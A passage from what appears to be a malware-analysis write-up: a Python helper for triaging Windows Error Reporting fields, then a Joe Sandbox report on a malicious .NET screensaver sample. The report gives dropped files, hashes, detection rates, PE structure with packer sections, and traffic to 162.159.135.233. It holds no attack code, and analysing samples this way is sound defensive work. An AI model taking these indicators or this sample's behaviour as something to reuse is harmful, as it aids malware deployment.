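def triage(fields: dict) -> dict:
    """Summarise the fields an analyst checks first."""
    host = MACHINE_TYPES.get(int(fields.get("Wow64Host", "0")), "unknown")
    guest = MACHINE_TYPES.get(int(fields.get("Wow64Guest", "0")), "unknown")
    on_disk = unescape_joe_name(fields.get("NsAppName", ""))
    original = fields.get("OriginalFilename", "")
    if host != guest:
        process = f"{guest} process under WOW64 on {host} host"
    else:
        process = f"native {host} process"
    return {
        "event_type": fields.get("EventType"),
        "crash_time_utc": filetime_to_utc(fields["EventTime"]).isoformat(timespec="seconds"),
        "process": process,
        "on_disk_name": on_disk,
        "version_info_name": original,
        # The PE version resource naming the binary differently from the file on
        # disk is a cheap but useful clue to the build's real name.
        "name_mismatch": original.lower() != on_disk.lower(),
    }


if __name__ == "__main__":
    for key, value in triage(parse_wer(SAMPLE_WER)).items():
        print(f"{key:<18} {value}")
```

For this sample the decoded EventTime is 2023-10-24T07:30:02Z, which matches the "Tue Oct 24 07:30:02 2023" stamp in the minidump entry that follows and the 09:30:05 (+02:00) WerFault.exe entry in the timeline, so the three artefacts describe one crash.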
                      Process:C:\Windows\SysWOW64\WerFault.exe
                      File Type:Mini DuMP crash report, 15 streams, Tue Oct 24 07:30:02 2023, 0x1205a4 type
                      Category:dropped
                      Size (bytes):369633
                      Entropy (8bit):3.4279932856059525
                      Encrypted:false
                      SSDEEP:3072:dnPNlMX4uEq9hMpfSLTg/NVylmIyGY1vEZV2mY4tuR:d0X4e9Tg/NVyl9ylEre4te
                      MD5:AE8B40817B4B5CB355D096541CC4DAB9
                      SHA1:0E1C37CFAFC73637D29486843BA2D5084AD38D53
                      SHA-256:55AEBFAD5D8DCA08FB7BA719826CF78F05B18E0570F29D53433B087DF8037C30
                      SHA-512:558AF7B45BF5C291BE626D0219BA313737CC6C2D188135285B8088D319CEDB0F19C92177D69F70F012B635774DBC068F469DF3C9B54139A2388B2491A5CBADC2
                      Malicious:false
                      Reputation:low
                      Process:C:\Windows\SysWOW64\WerFault.exe
                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):8660
                      Entropy (8bit):3.7046692682711906
                      Encrypted:false
                      SSDEEP:192:R6l7wVeJ4zlm6EP6YEITSUh8gmfM1PX/pDM89bQesf9ZQm:R6lXJ006s6YEcSUh8gmfkPDQdfJ
                      MD5:6A5857F2728E6D054266FC530F5D779D
                      SHA1:4BC03A24684E8E7ED81C7FF98AE2C7997524C649
                      SHA-256:C7F7970C27856E78593717CC95BCF41B41814CF372D0F4CE2AFFC65C487DD6DB
                      SHA-512:031ECF74655C7BA80CF6CD8F1349167E4E687021B19726B95DBCB77879401595256FF195B47CE20278F62C9A21C2C326F66E64D8AADD7C9D14F3505BB826898C
                      Malicious:false
                      Reputation:low
                      Preview:
                      <?xml version="1.0" encoding="UTF-16"?>
                      <WERReportMetadata>
                        <OSVersionInformation>
                          <WindowsNTVersion>10.0</WindowsNTVersion>
                          <Build>19045</Build>
                          <Product>(0x30): Windows 10 Pro</Product>
                          <Edition>Professional</Edition>
                          <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>
                          <Revision>2006</Revision>
                          <Flavor>Multiprocessor Free</Flavor>
                          <Architecture>X64</Architecture>
                          <LCID>2057</LCID>
                        </OSVersionInformation>
                        <ProcessInformation>
                          <Pid>6620</Pi
                      Process:C:\Windows\SysWOW64\WerFault.exe
                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):5050
                      Entropy (8bit):4.558302301004493
                      Encrypted:false
                      SSDEEP:48:cvIwWl8zsHJg77aI9laWpW8VYbPYm8M4Jbm6FA+q8vdmuDL0QB+poOpCd:uIjfpI7Pb7VSSJajKMGAQB+pxpCd
                      MD5:66F3526BDE1734C7088FEE6724501157
                      SHA1:195EBA5DA62D4E8082F8C0A9D8CAAFD7EE5EAB6A
                      SHA-256:8AF80B06960CFD923F38494B6F0B3EFE5A5DD0327FD9777177F1F51433BDEEE1
                      SHA-512:9EB5BEA9977A29B277F565CD60B40CBA931A332053074755B39525233E63A49CB1B8F8E7E1D5CDD05DB65ADAF0E6D0A2C0A06E76F4177DB62962B501B03A5C1A
                      Malicious:false
                      Reputation:low
                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="30152" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096
                      Process:C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr
                      File Type:CSV text
                      Category:dropped
                      Size (bytes):654
                      Entropy (8bit):5.380476433908377
                      Encrypted:false
                      SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                      MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                      SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                      SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                      SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                      Malicious:false
                      Reputation:low
                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
                      Process:C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr
                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):116224
                      Entropy (8bit):6.820395192798022
                      Encrypted:false
                      SSDEEP:1536:CE8SjUFylXO8cdGDkcsO+pNPpm79hic5df29aXIL6RYWgtajlio1Vb0xQ:ZwVtsDk06t07ic/XpRBiaJLVbD
                      MD5:2F621D531B27FF6BCF35DB5412A879BF
                      SHA1:947D4B62C5119AC955360CF6A94467AE4FC5518B
                      SHA-256:83C490F78A2359A82CAE24DBF470BA8F2B7CB751587617574468BD4B1AF2CF1A
                      SHA-512:95D16F4D96706887AE20EBEF5B185C057D8AA5570FB76630EADCBD09A758002A44E25E985F22C4719A710503FAA19FE10FA191284822984EB7A76647F661F0A4
                      Malicious:true
                      Antivirus:
                      • Antivirus: Joe Sandbox ML, Detection: 100%
                      • Antivirus: ReversingLabs, Detection: 91%
                      • Antivirus: Virustotal, Detection: 51%
                      Reputation:low
                      Process:C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe
                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):116224
                      Entropy (8bit):6.820395192798022
                      Encrypted:false
                      SSDEEP:1536:CE8SjUFylXO8cdGDkcsO+pNPpm79hic5df29aXIL6RYWgtajlio1Vb0xQ:ZwVtsDk06t07ic/XpRBiaJLVbD
                      MD5:2F621D531B27FF6BCF35DB5412A879BF
                      SHA1:947D4B62C5119AC955360CF6A94467AE4FC5518B
                      SHA-256:83C490F78A2359A82CAE24DBF470BA8F2B7CB751587617574468BD4B1AF2CF1A
                      SHA-512:95D16F4D96706887AE20EBEF5B185C057D8AA5570FB76630EADCBD09A758002A44E25E985F22C4719A710503FAA19FE10FA191284822984EB7A76647F661F0A4
                      Malicious:true
                      Antivirus:
                      • Antivirus: Joe Sandbox ML, Detection: 100%
                      • Antivirus: ReversingLabs, Detection: 91%
                      • Antivirus: Virustotal, Detection: 51%
                      Process:C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe
                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):283648
                      Entropy (8bit):7.181935920659255
                      Encrypted:false
                      SSDEEP:3072:OwQkOvDco3kuRcsAsQsj7uOi2VmeNDayrklOc5sccTwI/IXP6rXd1ahlTkflY70o:cLVkdsQQ7rmsaJOC0j/IXcjahlelSfq
                      MD5:D88092AABD3AF3BA4EF626C31962626E
                      SHA1:95235B832C708DBF13BD7697DE37C81EF70AB2B5
                      SHA-256:12DCBC603C08FAAF1FBA0596EBD8BEA58713F313540730109957514747BE1BAC
                      SHA-512:57D7FA482C31EE81895F57D2309941D3D8A637E93EDE69356A9B2A9AD61D334F2232081E828D81F0DF33E91F3A865E4252C024A84FABB3FC7B8A752B0880FEFF
                      Malicious:true
                      Antivirus:
                      • Antivirus: Joe Sandbox ML, Detection: 100%
                      • Antivirus: ReversingLabs, Detection: 39%
                      Process:C:\Users\user\Desktop\#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:modified
                      Size (bytes):26
                      Entropy (8bit):3.95006375643621
                      Encrypted:false
                      SSDEEP:3:ggPYV:rPYV
                      MD5:187F488E27DB4AF347237FE461A079AD
                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                      Malicious:false
                      Preview:[ZoneTransfer]....ZoneId=0
                      Process:C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr
                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):116224
                      Entropy (8bit):6.820395192798022
                      Encrypted:false
                      SSDEEP:1536:CE8SjUFylXO8cdGDkcsO+pNPpm79hic5df29aXIL6RYWgtajlio1Vb0xQ:ZwVtsDk06t07ic/XpRBiaJLVbD
                      MD5:2F621D531B27FF6BCF35DB5412A879BF
                      SHA1:947D4B62C5119AC955360CF6A94467AE4FC5518B
                      SHA-256:83C490F78A2359A82CAE24DBF470BA8F2B7CB751587617574468BD4B1AF2CF1A
                      SHA-512:95D16F4D96706887AE20EBEF5B185C057D8AA5570FB76630EADCBD09A758002A44E25E985F22C4719A710503FAA19FE10FA191284822984EB7A76647F661F0A4
                      Malicious:true
                      Antivirus:
                      • Antivirus: ReversingLabs, Detection: 91%
                      • Antivirus: Virustotal, Detection: 51%
                      Process:C:\Windows\SysWOW64\WerFault.exe
                      File Type:MS Windows registry file, NT/2000 or above
                      Category:dropped
                      Size (bytes):1835008
                      Entropy (8bit):4.422436068492893
                      Encrypted:false
                      SSDEEP:6144:wSvfpi6ceLP/9skLmb0OTRWSPHaJG8nAgeMZMMhA2fX4WABlEnNq0uhiTw:bvloTRW+EZMM6DFy803w
                      MD5:4F50CDF9251EF24E863508B5250C8253
                      SHA1:21B6342BFB3136DD8AC692488AB21F5D70DCD538
                      SHA-256:3CE1F20C8873264A261152260A5FEDFFD19A0721EBCEAE33A9F208D4C50CFFC2
                      SHA-512:DA065AAA77B5DF78663E3BE2C9E9687FA8A0F90E991A2838172A379ADF97BDCE85F4064D44DD626E49185AC81AB8AFB9A5CAE5CD4371EA8069F33637769A132C
                      Malicious:false
                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                      Entropy (8bit):7.181935920659255
                      TrID:
                      • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                      • Win32 Executable (generic) a (10002005/4) 49.96%
                      • Win16/32 Executable Delphi generic (2074/23) 0.01%
                      • Generic Win/DOS Executable (2004/3) 0.01%
                      • DOS Executable Generic (2002/1) 0.01%
                      File name:#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe
                      File size:283'648 bytes
                      MD5:d88092aabd3af3ba4ef626c31962626e
                      SHA1:95235b832c708dbf13bd7697de37c81ef70ab2b5
                      SHA256:12dcbc603c08faaf1fba0596ebd8bea58713f313540730109957514747be1bac
                      SHA512:57d7fa482c31ee81895f57d2309941d3d8a637e93ede69356a9b2a9ad61d334f2232081e828d81f0df33e91f3a865e4252c024a84fabb3fc7b8a752b0880feff
                      SSDEEP:3072:OwQkOvDco3kuRcsAsQsj7uOi2VmeNDayrklOc5sccTwI/IXP6rXd1ahlTkflY70o:cLVkdsQQ7rmsaJOC0j/IXcjahlelSfq
                      TLSH:8754BE357FFC4406C6D907B890E750A487F1B221B497E7E62407BBEA7A533E18D1A24B
                      Icon Hash:25627a1c0e263200
                      Entrypoint:0x43032a
                      Entrypoint Section:.vmp1
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Time Stamp:0x6532C3AB [Fri Oct 20 18:15:07 2023 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:4
                      OS Version Minor:0
                      File Version Major:4
                      File Version Minor:0
                      Subsystem Version Major:4
                      Subsystem Version Minor:0
                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                      Instruction
                      jmp dword ptr [00434000h]
                      Name | Virtual Address | Virtual Size | Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_IMPORT | 0x33630 | 0x28 | .vmp1
                      IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x74000 | 0xf94 | .rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x76000 | 0xc | .reloc
                      IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_IAT | 0x34000 | 0x8 | .vmp1
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x66480 | 0x48 | .vmp1
                      IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                      Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                      .text | 0x2000 | 0x50c4 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      .vmp0 | 0x8000 | 0x27b02 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      .vmp1 | 0x30000 | 0x43d08 | 0x43e00 | False | 0.7416335750460405 | data | 7.2244685170682175 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      .rsrc | 0x74000 | 0xf94 | 0x1000 | False | 0.4501953125 | data | 4.622068540033343 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .reloc | 0x76000 | 0xc | 0x200 | False | 0.044921875 | data | 0.09800417566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                      Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                      RT_ICON | 0x74130 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | | | 0.43727436823104693
                      RT_GROUP_ICON | 0x749d8 | 0x14 | data | | | 1.1
                      RT_VERSION | 0x749ec | 0x3bc | data | | | 0.4801255230125523
                      RT_MANIFEST | 0x74da8 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5469387755102041
                      DLL | Import
                      mscoree.dll | _CorExeMain
                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                      Oct 24, 2023 09:28:51.835947990 CEST | 49713 | 80 | 192.168.2.5 | 162.159.135.233
                      Oct 24, 2023 09:28:51.938301086 CEST | 80 | 49713 | 162.159.135.233 | 192.168.2.5
                      Oct 24, 2023 09:28:51.938411951 CEST | 49713 | 80 | 192.168.2.5 | 162.159.135.233
                      Oct 24, 2023 09:28:51.939522982 CEST | 49713 | 80 | 192.168.2.5 | 162.159.135.233
                      Oct 24, 2023 09:28:52.042155027 CEST | 80 | 49713 | 162.159.135.233 | 192.168.2.5
                      Oct 24, 2023 09:28:52.062495947 CEST | 80 | 49713 | 162.159.135.233 | 192.168.2.5
                      Oct 24, 2023 09:28:52.067778111 CEST | 49714 | 443 | 192.168.2.5 | 162.159.135.233
                      Oct 24, 2023 09:28:52.067821026 CEST | 443 | 49714 | 162.159.135.233 | 192.168.2.5
                      Oct 24, 2023 09:28:52.067989111 CEST | 49714 | 443 | 192.168.2.5 | 162.159.135.233
                      Oct 24, 2023 09:28:52.076260090 CEST | 49714 | 443 | 192.168.2.5 | 162.159.135.233
                      Oct 24, 2023 09:28:52.076281071 CEST | 443 | 49714 | 162.159.135.233 | 192.168.2.5
                      Oct 24, 2023 09:28:52.108514071 CEST | 49713 | 80 | 192.168.2.5 | 162.159.135.233
                      Oct 24, 2023 09:28:52.303442001 CEST | 443 | 49714 | 162.159.135.233 | 192.168.2.5
                      Oct 24, 2023 09:28:52.303561926 CEST | 49714 | 443 | 192.168.2.5 | 162.159.135.233
                      Oct 24, 2023 09:28:52.309819937 CEST | 49714 | 443 | 192.168.2.5 | 162.159.135.233
                      Oct 24, 2023 09:28:52.309829950 CEST | 443 | 49714 | 162.159.135.233 | 192.168.2.5
                      Oct 24, 2023 09:28:52.310295105 CEST | 443 | 49714 | 162.159.135.233 | 192.168.2.5
                      Oct 24, 2023 09:28:52.358546972 CEST | 49714 | 443 | 192.168.2.5 | 162.159.135.233
                      Oct 24, 2023 09:28:52.399095058 CEST | 49714 | 443 | 192.168.2.5 | 162.159.135.233
                      Oct 24, 2023 09:28:52.442456007 CEST | 443 | 49714 | 162.159.135.233 | 192.168.2.5
                      Oct 24, 2023 09:28:52.650824070 CEST | 443 | 49714 | 162.159.135.233 | 192.168.2.5
                      Oct 24, 2023 09:28:52.650928974 CEST | 443 | 49714 | 162.159.135.233 | 192.168.2.5
                      Oct 24, 2023 09:28:52.650975943 CEST | 443 | 49714 | 162.159.135.233 | 192.168.2.5
                      Oct 24, 2023 09:28:52.651016951 CEST | 49714 | 443 | 192.168.2.5 | 162.159.135.233
                      Oct 24, 2023 09:28:52.651041985 CEST | 443 | 49714 | 162.159.135.233 | 192.168.2.5
                      Oct 24, 2023 09:28:52.651088953 CEST | 443 | 49714 | 162.159.135.233 | 192.168.2.5
                      Oct 24, 2023 09:28:52.651089907 CEST | 49714 | 443 | 192.168.2.5 | 162.159.135.233
                      Oct 24, 2023 09:28:52.651101112 CEST | 443 | 49714 | 162.159.135.233 | 192.168.2.5
                      Oct 24, 2023 09:28:52.651154995 CEST | 49714 | 443 | 192.168.2.5 | 162.159.135.233
                      Oct 24, 2023 09:28:52.651161909 CEST | 443 | 49714 | 162.159.135.233 | 192.168.2.5
                      Oct 24, 2023 09:28:52.651206970 CEST | 443 | 49714 | 162.159.135.233 | 192.168.2.5
                      Oct 24, 2023 09:28:52.651246071 CEST | 49714 | 443 | 192.168.2.5 | 162.159.135.233
                      Oct 24, 2023 09:28:52.651247025 CEST | 443 | 49714 | 162.159.135.233 | 192.168.2.5
                      Oct 24, 2023 09:28:52.651258945 CEST | 443 | 49714 | 162.159.135.233 | 192.168.2.5
                      Oct 24, 2023 09:28:52.651293993 CEST | 49714 | 443 | 192.168.2.5 | 162.159.135.233
                      Oct 24, 2023 09:28:52.651300907 CEST | 443 | 49714 | 162.159.135.233 | 192.168.2.5
                      Oct 24, 2023 09:28:52.651629925 CEST | 443 | 49714 | 162.159.135.233 | 192.168.2.5
                      Oct 24, 2023 09:28:52.651678085 CEST | 49714 | 443 | 192.168.2.5 | 162.159.135.233
                      Oct 24, 2023 09:28:52.651688099 CEST | 443 | 49714 | 162.159.135.233 | 192.168.2.5
                      Oct 24, 2023 09:28:52.651892900 CEST | 443 | 49714 | 162.159.135.233 | 192.168.2.5
                      Oct 24, 2023 09:28:52.651931047 CEST | 49714 | 443 | 192.168.2.5 | 162.159.135.233
                      Oct 24, 2023 09:28:52.651937962 CEST | 443 | 49714 | 162.159.135.233 | 192.168.2.5
                      Oct 24, 2023 09:28:52.652122021 CEST | 443 | 49714 | 162.159.135.233 | 192.168.2.5
                      Oct 24, 2023 09:28:52.652159929 CEST | 49714 | 443 | 192.168.2.5 | 162.159.135.233
                      Oct 24, 2023 09:28:52.652165890 CEST | 443 | 49714 | 162.159.135.233 | 192.168.2.5
                      Oct 24, 2023 09:28:52.652647018 CEST | 443 | 49714 | 162.159.135.233 | 192.168.2.5
                      Oct 24, 2023 09:28:52.652693987 CEST | 49714 | 443 | 192.168.2.5 | 162.159.135.233
                      Oct 24, 2023 09:28:52.652700901 CEST | 443 | 49714 | 162.159.135.233 | 192.168.2.5
                      Oct 24, 2023 09:28:52.652816057 CEST | 443 | 49714 | 162.159.135.233 | 192.168.2.5
                      Oct 24, 2023 09:28:52.652853966 CEST | 49714 | 443 | 192.168.2.5 | 162.159.135.233
                      Oct 24, 2023 09:28:52.652858973 CEST | 443 | 49714 | 162.159.135.233 | 192.168.2.5
                      Oct 24, 2023 09:28:52.653076887 CEST | 443 | 49714 | 162.159.135.233 | 192.168.2.5
                      Oct 24, 2023 09:28:52.653117895 CEST | 49714 | 443 | 192.168.2.5 | 162.159.135.233
                      Oct 24, 2023 09:28:52.653124094 CEST | 443 | 49714 | 162.159.135.233 | 192.168.2.5
                      Oct 24, 2023 09:28:52.653763056 CEST | 443 | 49714 | 162.159.135.233 | 192.168.2.5
                      Oct 24, 2023 09:28:52.653810024 CEST | 443 | 49714 | 162.159.135.233 | 192.168.2.5
                      Oct 24, 2023 09:28:52.653819084 CEST | 49714 | 443 | 192.168.2.5 | 162.159.135.233
                      Oct 24, 2023 09:28:52.653826952 CEST | 443 | 49714 | 162.159.135.233 | 192.168.2.5
                      Oct 24, 2023 09:28:52.653867960 CEST | 49714 | 443 | 192.168.2.5 | 162.159.135.233
                      Oct 24, 2023 09:28:52.653896093 CEST | 443 | 49714 | 162.159.135.233 | 192.168.2.5
                      Oct 24, 2023 09:28:52.654124022 CEST | 443 | 49714 | 162.159.135.233 | 192.168.2.5
                      Oct 24, 2023 09:28:52.654165030 CEST | 49714 | 443 | 192.168.2.5 | 162.159.135.233
                      Oct 24, 2023 09:28:52.654170036 CEST | 443 | 49714 | 162.159.135.233 | 192.168.2.5
                      Oct 24, 2023 09:28:52.654787064 CEST | 443 | 49714 | 162.159.135.233 | 192.168.2.5
                      Oct 24, 2023 09:28:52.654839039 CEST | 49714 | 443 | 192.168.2.5 | 162.159.135.233
                      Oct 24, 2023 09:28:52.654844046 CEST | 443 | 49714 | 162.159.135.233 | 192.168.2.5
                      Oct 24, 2023 09:28:52.654931068 CEST | 443 | 49714 | 162.159.135.233 | 192.168.2.5
                      Oct 24, 2023 09:28:52.654973030 CEST | 49714 | 443 | 192.168.2.5 | 162.159.135.233
                      Oct 24, 2023 09:28:52.654978037 CEST | 443 | 49714 | 162.159.135.233 | 192.168.2.5
                      Oct 24, 2023 09:28:52.655052900 CEST | 443 | 49714 | 162.159.135.233 | 192.168.2.5
                      Oct 24, 2023 09:28:52.655093908 CEST | 49714 | 443 | 192.168.2.5 | 162.159.135.233
                      Oct 24, 2023 09:28:52.655100107 CEST | 443 | 49714 | 162.159.135.233 | 192.168.2.5
                      Oct 24, 2023 09:28:52.655302048 CEST | 443 | 49714 | 162.159.135.233 | 192.168.2.5
                      Oct 24, 2023 09:28:52.655348063 CEST | 49714 | 443 | 192.168.2.5 | 162.159.135.233
                      Oct 24, 2023 09:28:52.655352116 CEST | 443 | 49714 | 162.159.135.233 | 192.168.2.5
                      Oct 24, 2023 09:28:52.655363083 CEST | 443 | 49714 | 162.159.135.233 | 192.168.2.5
                      Oct 24, 2023 09:28:52.655421019 CEST | 49714 | 443 | 192.168.2.5 | 162.159.135.233
                      Oct 24, 2023 09:28:52.655431986 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.656124115 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.656176090 CEST49714443192.168.2.5162.159.135.233
                      Oct 24, 2023 09:28:52.656182051 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.656369925 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.656421900 CEST49714443192.168.2.5162.159.135.233
                      Oct 24, 2023 09:28:52.656428099 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.656471968 CEST49714443192.168.2.5162.159.135.233
                      Oct 24, 2023 09:28:52.755404949 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.755494118 CEST49714443192.168.2.5162.159.135.233
                      Oct 24, 2023 09:28:52.755795002 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.755848885 CEST49714443192.168.2.5162.159.135.233
                      Oct 24, 2023 09:28:52.756023884 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.756071091 CEST49714443192.168.2.5162.159.135.233
                      Oct 24, 2023 09:28:52.756258011 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.756306887 CEST49714443192.168.2.5162.159.135.233
                      Oct 24, 2023 09:28:52.756536007 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.756587029 CEST49714443192.168.2.5162.159.135.233
                      Oct 24, 2023 09:28:52.757507086 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.757564068 CEST49714443192.168.2.5162.159.135.233
                      Oct 24, 2023 09:28:52.757858992 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.757911921 CEST49714443192.168.2.5162.159.135.233
                      Oct 24, 2023 09:28:52.758135080 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.758184910 CEST49714443192.168.2.5162.159.135.233
                      Oct 24, 2023 09:28:52.758348942 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.758414984 CEST49714443192.168.2.5162.159.135.233
                      Oct 24, 2023 09:28:52.758723021 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.758776903 CEST49714443192.168.2.5162.159.135.233
                      Oct 24, 2023 09:28:52.758831978 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.758878946 CEST49714443192.168.2.5162.159.135.233
                      Oct 24, 2023 09:28:52.759299994 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.759349108 CEST49714443192.168.2.5162.159.135.233
                      Oct 24, 2023 09:28:52.759607077 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.759658098 CEST49714443192.168.2.5162.159.135.233
                      Oct 24, 2023 09:28:52.759820938 CEST44349714162.159.135.233192.168.2.5
                      Oct 24, 2023 09:28:52.759871006 CEST49714443192.168.2.5162.159.135.233
                      Oct 24, 2023 09:28:52.759875059 CEST44349714162.159.135.233192.168.2.5
